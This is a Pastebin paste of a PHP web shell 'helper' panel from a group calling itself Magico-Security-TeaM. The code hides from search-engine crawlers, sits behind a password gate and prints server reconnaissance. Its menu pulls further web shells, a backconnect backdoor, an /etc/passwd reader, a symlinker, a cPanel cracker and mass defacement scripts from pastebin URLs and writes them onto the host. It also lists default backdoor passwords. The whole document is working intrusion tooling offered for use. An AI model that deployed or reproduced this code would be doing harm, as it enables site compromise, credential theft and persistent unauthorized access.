API tools faq
paste
Magico-Security-TeaM

Magico-Helper-v2

Magico-Security-TeaM
Apr 1st, 2016
498
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 17.28 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. //================================================
  3. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  4.     $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  5.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  6.         header('HTTP/1.0 404 Not Found');
  7.         exit;
  8.     }
  9. }
  10. //==============================================
  11. $pass = "e48e13207341b6bffb7fb1622282247b"; // Change it if you want. Type:[md5] = 1337
  12.  
  13. if (isset ($_POST['passwrd']) && (md5 ($_POST['passwrd']) == $pass)) {
  14.     $_COOKIE["pass"] = $pass;
  15.     setcookie ("pass", $pass);
  16. }
  17.  
  18.  
  19. if(isset($_POST['unset'])){
  20.     setcookie ("pass", $pass,time()-1);
  21.         echo '
  22. <html>
  23. <head>
  24. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  25. <title></title>
  26. <style type="text/css">
  27. body
  28. {
  29.   background-color: #FFFFFF;
  30.   color: #000000;
  31.   font-family: Arial;
  32.   font-size: 13px;
  33.   margin: 0;
  34.   padding: 0;
  35. }
  36. </style>
  37. <style type="text/css">
  38. a
  39. {
  40.   color: #0000FF;
  41.   text-decoration: underline;
  42. }
  43. a:visited
  44. {
  45.   color: #800080;
  46. }
  47. a:active
  48. {
  49.   color: #FF0000;
  50. }
  51. a:hover
  52. {
  53.   color: #0000FF;
  54.   text-decoration: underline;
  55. }
  56. </style>
  57. <style type="text/css">
  58. #Image2
  59. {
  60.   border: 0px #000000 solid;
  61. }
  62. .loginform_table
  63. {
  64.   background-color: #EEEEEE;
  65.   border-color:#878787;
  66.   border-width:1px;
  67.   border-style: solid;
  68.   color: #000000;
  69.   border-spacing: 4px;
  70.   font-family: Arial;
  71.   font-size: 13px;
  72.   text-align: right;
  73. }
  74. .loginform_header
  75. {
  76.   background-color: #878787;
  77.   color: #FFFFFF;
  78.   text-align: center;
  79. }
  80. .loginform_text
  81. {
  82.   background-color: #FFFFFF;
  83.   border-color: #878787;
  84.   border-width: 1px;
  85.   border-style: solid;
  86.   color: #000000;
  87.   font-family: Arial;
  88.   font-size: 13px;
  89. }
  90. .loginform_button
  91. {
  92.   background-color: #FFFFFF;
  93.   border-color: #878787;
  94.   border-width: 1px;
  95.   border-style: solid;
  96.   color: #000000;
  97.   font-family: Arial;
  98.   font-size: 13px;
  99. }
  100. </style>
  101. </head>
  102. <body>
  103.  
  104. <table cellspacing="0" cellpadding="0" id="Image2">
  105. <tr>
  106. <td><img src="http://i.imgur.com/VX7C0W3.png" id="Image2_slice0" alt="" style="width:682px;height:302px;"></td>
  107. <td><img src="http://i.imgur.com/aGntkZW.png" id="Image2_slice1" alt="" style="width:683px;height:302px;"></td>
  108. </tr>
  109. <tr>
  110. <td><img src="http://i.imgur.com/9EpOseZ.png" id="Image2_slice2" alt="" style="width:682px;height:303px;"></td>
  111. <td><img src="http://i.imgur.com/JHNa2gF.png" id="Image2_slice3" alt="" style="width:683px;height:303px;"></td>
  112. </tr>
  113. </table>
  114. </div>
  115. <div id="wb_Login1" style="position:absolute;left:13px;top:4px;width:60px;height:50px;text-align:right;z-index:2;">
  116. <form name="loginform" method="post" action="" id="loginform">
  117. <input type="hidden" name="form_name" value="loginform">
  118. <table class="loginform_table" style="width:80px;height:80px;">
  119. <tr>
  120.   <td class="loginform_header" colspan="2" style="height:20px;">Log In</td>
  121. </tr>
  122. <tr>
  123.   <td style="height:20px">Password:</td>
  124.   <td style="text-align:left"><input class="loginform_text" name="passwrd" type="password" id="password" value="" style="width:100px;height:18px;"></td>
  125. </tr>
  126. <tr>
  127.   <td>&nbsp;</td><td style="text-align:left;vertical-align:bottom"><input class="loginform_button" type="submit" name="login" value="Login" id="login" style="width:70px;height:20px;"></td>
  128. </tr>
  129. </table>
  130. </form>
  131. </div>
  132. </body>
  133. </html>';
  134.     exit;
  135. }
  136.  
  137.  
  138.  
  139.  
  140. if (!isset ($_COOKIE["pass"]) || ($_COOKIE["pass"] != $pass)) {
  141.     echo '
  142.  
  143.  
  144. <html>
  145. <head>
  146. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  147. <title></title>
  148. <style type="text/css">
  149. body
  150. {
  151.   background-color: #FFFFFF;
  152.   color: #000000;
  153.   font-family: Arial;
  154.   font-size: 13px;
  155.   margin: 0;
  156.   padding: 0;
  157. }
  158. </style>
  159. <style type="text/css">
  160. a
  161. {
  162.   color: #0000FF;
  163.   text-decoration: underline;
  164. }
  165. a:visited
  166. {
  167.   color: #800080;
  168. }
  169. a:active
  170. {
  171.   color: #FF0000;
  172. }
  173. a:hover
  174. {
  175.   color: #0000FF;
  176.   text-decoration: underline;
  177. }
  178. </style>
  179. <style type="text/css">
  180. #Image2
  181. {
  182.   border: 0px #000000 solid;
  183. }
  184. .loginform_table
  185. {
  186.   background-color: #EEEEEE;
  187.   border-color:#878787;
  188.   border-width:1px;
  189.   border-style: solid;
  190.   color: #000000;
  191.   border-spacing: 4px;
  192.   font-family: Arial;
  193.   font-size: 13px;
  194.   text-align: right;
  195. }
  196. .loginform_header
  197. {
  198.   background-color: #878787;
  199.   color: #FFFFFF;
  200.   text-align: center;
  201. }
  202. .loginform_text
  203. {
  204.   background-color: #FFFFFF;
  205.   border-color: #878787;
  206.   border-width: 1px;
  207.   border-style: solid;
  208.   color: #000000;
  209.   font-family: Arial;
  210.   font-size: 13px;
  211. }
  212. .loginform_button
  213. {
  214.   background-color: #FFFFFF;
  215.   border-color: #878787;
  216.   border-width: 1px;
  217.   border-style: solid;
  218.   color: #000000;
  219.   font-family: Arial;
  220.   font-size: 13px;
  221. }
  222. </style>
  223. </head>
  224. <body>
  225.  
  226. <table cellspacing="0" cellpadding="0" id="Image2">
  227. <tr>
  228. <td><img src="http://i.imgur.com/VX7C0W3.png" id="Image2_slice0" alt="" style="width:682px;height:302px;"></td>
  229. <td><img src="http://i.imgur.com/aGntkZW.png" id="Image2_slice1" alt="" style="width:683px;height:302px;"></td>
  230. </tr>
  231. <tr>
  232. <td><img src="http://i.imgur.com/9EpOseZ.png" id="Image2_slice2" alt="" style="width:682px;height:303px;"></td>
  233. <td><img src="http://i.imgur.com/JHNa2gF.png" id="Image2_slice3" alt="" style="width:683px;height:303px;"></td>
  234. </tr>
  235. </table>
  236. </div>
  237. <div id="wb_Login1" style="position:absolute;left:13px;top:4px;width:60px;height:50px;text-align:right;z-index:2;">
  238. <form name="loginform" method="post" action="" id="loginform">
  239. <input type="hidden" name="form_name" value="loginform">
  240. <table class="loginform_table" style="width:80px;height:80px;">
  241. <tr>
  242.   <td class="loginform_header" colspan="2" style="height:20px;">Log In</td>
  243. </tr>
  244. <tr>
  245.   <td style="height:20px">Password:</td>
  246.   <td style="text-align:left"><input class="loginform_text" name="passwrd" type="password" id="password" value="" style="width:100px;height:18px;"></td>
  247. </tr>
  248. <tr>
  249.   <td>&nbsp;</td><td style="text-align:left;vertical-align:bottom"><input class="loginform_button" type="submit" name="login" value="Login" id="login" style="width:70px;height:20px;"></td>
  250. </tr>
  251. </table>
  252. </form>
  253. </div>
  254. </body>
  255. </html>';
  256.  
  257.     exit;
  258. }
  259.  
  260. ?>
  261.  
  262.  
  263. <html>
  264. <head>
  265. <meta content="text/html; charset=ISO-8859-1"
  266. http-equiv="content-type">
  267. <title>.:! Magico HelpeR !:.</title>
  268. </head>
  269. <body style="background-color: black; color: rgb(0, 0, 0);"
  270. alink="#ee0000" link="#0000ee" vlink="#551a8b">
  271. <div style="text-align: left;"><span style="color: rgb(0, 153, 0);"></span><span
  272. style="color: rgb(51, 204, 0); font-weight: bold;"><span
  273. style="color: rgb(153, 153, 0);">.:!~@</span># </span><span
  274. style="color: red; font-weight: bold;"><a href="https://www.facebook.com/magico.sec">Magico Helper</a></span><span
  275. style="font-weight: bold;"> </span><span
  276. style="color: rgb(51, 204, 0); font-weight: bold;">#<span
  277. style="color: rgb(153, 153, 0);">@~!:.</span></span><span
  278. style="color: white;"></span>
  279. <span style="font-weight: bold;"></span><br>
  280. <span style="font-weight: bold;"><img
  281. style="width: 239px; height: 186px;" alt=""
  282. src="http://i.imgur.com/KWGs1PW.jpg"></span><br>
  283. <span style="font-weight: bold;"></span><small><span
  284. style="color: rgb(0, 153, 0);"><big><small><b>.: <span
  285. style="color: rgb(204, 153, 51);">Server InFo </span>:.</b></small></big></span></small><br>
  286. <small><span style="color: rgb(0, 153, 0);"><big>
  287. <small>---------------------------------------------------------------------------------------<br>
  288. <?php
  289. @set_time_limit(0);
  290. @error_reporting(0);
  291. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server Software   : </span></b>".$_SERVER['SERVER_SOFTWARE']."<br>";
  292. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server Admin      : </span></b>".$_SERVER['SERVER_ADMIN']."<br>";
  293. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> User              : </span></b>".get_current_user()."<br>";
  294. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server IP         : </span></b>".$_SERVER['SERVER_ADDR']."<br>";
  295. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Your IP           : </span></b>".$_SERVER["REMOTE_ADDR"]."<br>";
  296. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Uname             : </span></b>".php_uname()."<br>";
  297. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Php version       : </span></b>".phpversion()."<br>";
  298. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Dir               : </span></b>".getcwd()."<br>";
  299. ////////////////////////////////////
  300. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Safe Mode         : </span></b>";
  301.     if(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on'){
  302.         echo "<span style=\"font-weight: bold; color: red;\">On</span>";
  303.        
  304.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>"; }
  305. echo "<br>";
  306. //////////////////////////////////
  307. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Curl                 :</span></b>";
  308.     if(function_exists("curl_version")){
  309.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  310.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  311.  
  312. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Perl                 :</span></b>";
  313.     if(function_exists("perl -h")){
  314.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  315.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  316.  
  317. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Python                 :</span></b>";
  318.     if(function_exists("python -h")){
  319.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  320.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  321.    
  322. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Bash                 :</span></b>";
  323.     if(function_exists("bash -h")){
  324.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  325.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  326.  
  327. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Mysql                 :</span></b>";
  328.     if(function_exists("mysql_connect")){
  329.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  330.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  331.    
  332. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Mssql                 :</span></b>";
  333.     if(function_exists("mssql_connect")){
  334.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  335.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  336.  
  337. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Oracle                 :</span></b>";
  338.     if(function_exists("ocilogon")){
  339.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  340.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  341.    
  342. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Postgrase                 :</span></b>";
  343.     if(function_exists("pg_connect")){
  344.         echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  345.     }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  346.  
  347. //////////////////////////////////
  348. echo "<br><b>[#]<span style=\"color: rgb(51, 204, 0);\"> Disable_functions  : </span></b>";
  349.  
  350.     $disable_funs = @ini_get('disable_functions');
  351.     $arr = explode(',', $disable_funs);
  352.     foreach($arr as $fun){
  353.         echo "<span style=\"font-weight: bold; color: red;\">$fun</span>"." - ";
  354.     }
  355.  
  356.  
  357. /* or
  358.     $funs =array("system","exec","shell_exec","passthru","ln","copy","symlink","show_source","mail");
  359.         foreach($funs as $fun){
  360.             if(!function_exists($fun)){
  361.                 echo $fun." - ";
  362.             }
  363.         }*/
  364. //////////////////////////////
  365. echo"<br>";
  366. echo"---------------------------------------------------------------------------------------------------------------------------------------------------<br><br>";
  367. echo'<form method="post">
  368. <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Tools Grabber : <b></span><select name="tools" >
  369. <option>===================</option>
  370. <option>hidden uploader</option>
  371. <option>k2ll33d shell</option>
  372. <option>x shell</option>
  373. <option>webr00t</option>
  374. <option>fwso shell</option>
  375. <option>awso shell</option>
  376. <option>mass</option>
  377. <option>/etc/passwd</option>
  378. <option>server users</option>
  379. <option>backconnect weevely</option>
  380. <option>turbo cpanel</option>
  381. <option>symlinker</option>
  382. <option>adminer</option>
  383. <option>mailer</option>
  384. <option>Magico pws</option>
  385. <option>safe mode</option>
  386. <option>404 shell</option>
  387. <option>wp mass info changer</option>
  388. <option>jo mass info changer</option>
  389. <option>g-b file manager</option>
  390.  
  391. </select>
  392. <input type="submit" name="get" value="Get" />
  393. </form>';
  394. /////////////////////////////////////////////////////////////////
  395. if(isset($_POST['get'])){
  396.     switch($_POST['tools']){
  397.    
  398.         case "x shell":
  399.         echo gino('http://pastebin.com/raw.php?i=vYzbTTs8','oop.php');
  400.         break;
  401.         //////////////////////////////////////////////
  402.         case "webr00t":
  403.         echo gino('http://pastebin.com/raw.php?i=N5q1T1SH','r00t.php');
  404.         break;
  405.         //////////////////////////////////////////////
  406.         case "hidden uploader":
  407.         echo gino('http://pastebin.com/raw.php?i=gtKnzWyB','upx.php');
  408.         break;
  409.         //////////////////////////////////////////////
  410.         case "awso shell":
  411.         echo gino('http://pastebin.com/raw.php?i=0USmsjpW','awso.php');
  412.         break; 
  413.         //////////////////////////////////////////////
  414.         case "mass":
  415.         echo gino('http://pastebin.com/raw.php?i=KbMUxa0c','mass.php');
  416.         break; 
  417.         //////////////////////////////////////////////
  418.         case "/etc/passwd":
  419.         echo gino('http://pastebin.com/raw.php?i=KbwUY0aR','passwd.php');
  420.         break;     
  421.         //////////////////////////////////////////////
  422.         case "k2ll33d shell":
  423.         echo gino('http://pastebin.com/raw.php?i=8mwwA4V2','k.php');
  424.         break;             
  425.         //////////////////////////////////////////////
  426.         case "fwso shell":
  427.         echo gino('http://pastebin.com/raw.php?i=f2VWCsNY','fwso.php');
  428.         break;         
  429.         //////////////////////////////////////////////
  430.         case "adminer":
  431.         echo gino('http://pastebin.com/raw.php?i=BZHXtZqu','adminer.php');
  432.         break; 
  433.         //////////////////////////////////////////////
  434.         case "backconnect weevely":
  435.         echo gino('http://pastebin.com/raw.php?i=6YkfqzQ1','bc.php');
  436.         break;         
  437.         //////////////////////////////////////////////
  438.         case "turbo cpanel":
  439.         echo gino('http://pastebin.com/raw.php?i=svbEfUPF','turbo.php');
  440.         break;         
  441.         //////////////////////////////////////////////
  442.         case "symlinker":
  443.         echo gino('http://pastebin.com/raw.php?i=NX74fQQU','symv4.php');
  444.         break;     
  445.         //////////////////////////////////////////////
  446.         case "server users":
  447.         echo gino('http://pastebin.com/raw.php?i=5VKD1nEk','users.php');
  448.         break;         
  449.         //////////////////////////////////////////////
  450.         case "mailer":
  451.         echo gino('http://pastebin.com/raw.php?i=9zzgByV6','wp-mailer.php');
  452.         break;
  453.         //////////////////////////////////////////////
  454.         case "Magico pws":
  455.         echo gino('http://pastebin.com/raw.php?i=5EUWbPRv','pws.php');
  456.         break;
  457.         //////////////////////////////////////////////
  458.         case "safe mode":
  459.         echo gino('http://pastebin.com/raw.php?i=Te1e1uhA','php.ini');
  460.         break;
  461.         //////////////////////////////////////////////
  462.         case "404 shell":
  463.         echo gino('http://pastebin.com/raw.php?i=6caNG1Jf','404.php');
  464.         break;     
  465.         //////////////////////////////////////////////
  466.         case "wp mass info changer":
  467.         echo gino('http://pastebin.com/raw.php?i=v55JUXQp','wp-masser.php');
  468.         break;
  469.         //////////////////////////////////////////////
  470.         case "jo mass info changer":
  471.         echo gino('http://pastebin.com/raw.php?i=sjrCVapz','jo-masser.php');
  472.         break;
  473.         //////////////////////////////////////////////
  474.         case "g-b file manager":
  475.         echo gino('http://pastebin.com/raw/mZefbEQt','g-b.php');
  476.         break;
  477.                
  478.    
  479.         } // switch end
  480. }// end if
  481. ////////////////////////////////////////////////////////////////
  482. // by INJECTOR_MA
  483. function gino($input,$output){
  484.     @mkdir('gino');
  485.     @chdir('./gino');
  486.    
  487.     if(!file_exists($output)){
  488.        
  489.     $cn = @file_get_contents($input);
  490.     $save = fopen("$output","a+"); fwrite($save,@file_get_contents($input)); fclose($save);
  491.     return "<br>[#]DoNe: <a href=\"./gino/$output\"> Go to Here </a>";
  492.     }else{ return "<br>[#] Allready Here : <a href=\"./gino/$output\"> Go to Here </a>"; }
  493.    
  494. }              
  495. ///////////////////////////////////////////////////////////////
  496.  
  497. ?>
  498.  
  499. <br><br>
  500. <span style="color: rgb(0, 153, 0);">[#]</span> <span
  501. style="color: rgb(0, 153, 0);"><span style="color: rgb(51, 204, 0);"><span
  502. style="color: rgb(153, 51, 153);">Please
  503. Notice</span> :</span> the password of the <span
  504. style="color: rgb(51, 204, 0);">[ weevely backdoor</span> ] is <span
  505. style="color: rgb(153, 153, 0);">123456</span></span>
  506. <br>
  507. <span
  508. style="color: rgb(0, 153, 0);">[#] the user of [<span
  509. style="color: rgb(51, 204, 0);"> fwso shell</span>
  510. ] is <span style="color: rgb(153, 153, 0);">magico</span> and the
  511. password is <span style="color: rgb(153, 153, 0);">xmagico</span></span>
  512. <span style="color: rgb(0, 153, 0);"></span>
  513. <br>
  514. <span style="color: rgb(0, 153, 0);">[#] to view <span
  515. style="color: rgb(51, 204, 0);">the hidden uplouder</span> write (<span
  516. style="color: rgb(153, 153, 0);">up.php?x=x</span>) </span><br>
  517. <span style="color: rgb(0, 153, 0);">[#] The Pass of <span
  518. style="color: rgb(51, 204, 0);">404 shell</span> is</span><span
  519. style="color: rgb(255, 204, 51);"> <span
  520. style="color: rgb(204, 153, 51);">xmagico</span></span>
  521. <br><b>...::::::: https://www.facebook.com/magico.sec ::::::::...</b>
  522.  
  523.  
  524. </big></span></body></html>
  525. <?php echo '<form method="post"><input type="submit" name="unset" value="logout" /></form>'; ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!